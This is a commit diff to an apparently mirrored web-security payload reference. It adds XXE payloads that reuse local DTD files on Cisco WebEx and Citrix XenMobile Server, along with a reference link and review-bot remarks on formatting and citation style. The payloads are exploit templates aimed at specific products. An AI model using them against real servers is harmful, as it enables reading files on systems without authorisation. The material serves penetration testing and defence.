mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
commit
a766679356
1 changed files with 14 additions and 1 deletions
|
@ -388,7 +388,18 @@ Assuming payloads such as the previous return a verbose error. You can start poi
|
||||||
]>
|
]>
|
||||||
<root></root>
|
<root></root>
|
||||||
```
|
```
|
||||||
|
### Cisco WebEx
|
||||||
|
```
|
||||||
|
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd">
|
||||||
|
<!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'>
|
||||||
|
%local_dtd;
|
||||||
|
```
|
||||||
|
### Citrix XenMobile Server
|
||||||
|
```
|
||||||
|
<!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd">
|
||||||
|
<!ENTITY % Body '>Your DTD code<!ENTITY test "test"'>
|
||||||
|
%local_dtd;
|
||||||
|
```
|
||||||
[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
|
[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
|
||||||
|
|
||||||
|
|
||||||
|
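Review bot: formatting and missing context in the two added sections. As rendered, `### Cisco WebEx` follows the closing fence of the previous example with no blank line, `### Citrix XenMobile Server` follows the Cisco block's closing fence the same way, and the "Other payloads using different DTDs" link now sits directly under the Citrix block's closing fence, so it reads as part of that section. Add a blank line before each heading and before the link so the Markdown renders consistently. Neither section says that `url.attribute.set` and `Body` are parameter entities declared in the referenced local DTD, or what the `Your DTD code` placeholder stands for; one introductory sentence per section would cover that, and it should also state that the Citrix path (`jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/...`) is installation-specific.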
@ -638,3 +649,5 @@ UTF-7 encoding can be used as well to bypass UTF-8/UTF-16 rules.
|
||||||
* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
|
* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
|
||||||
* [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK
|
* [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK
|
||||||
* [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin
|
* [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin
|
||||||
|
* [Payloads for Cisco and Citrix - Arseniy Sharoglazov](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
|
||||||
|
|
||||||
|
|
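Review bot: the added reference entry does not follow the format of the entries above it, which use `[Source - Title](url) - date - author`. In `[Payloads for Cisco and Citrix - Arseniy Sharoglazov](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)` the author name is inside the link text and no publication date is given. Move the author outside the link and add the date so the list stays uniform and the two new payload sections have a properly attributed source.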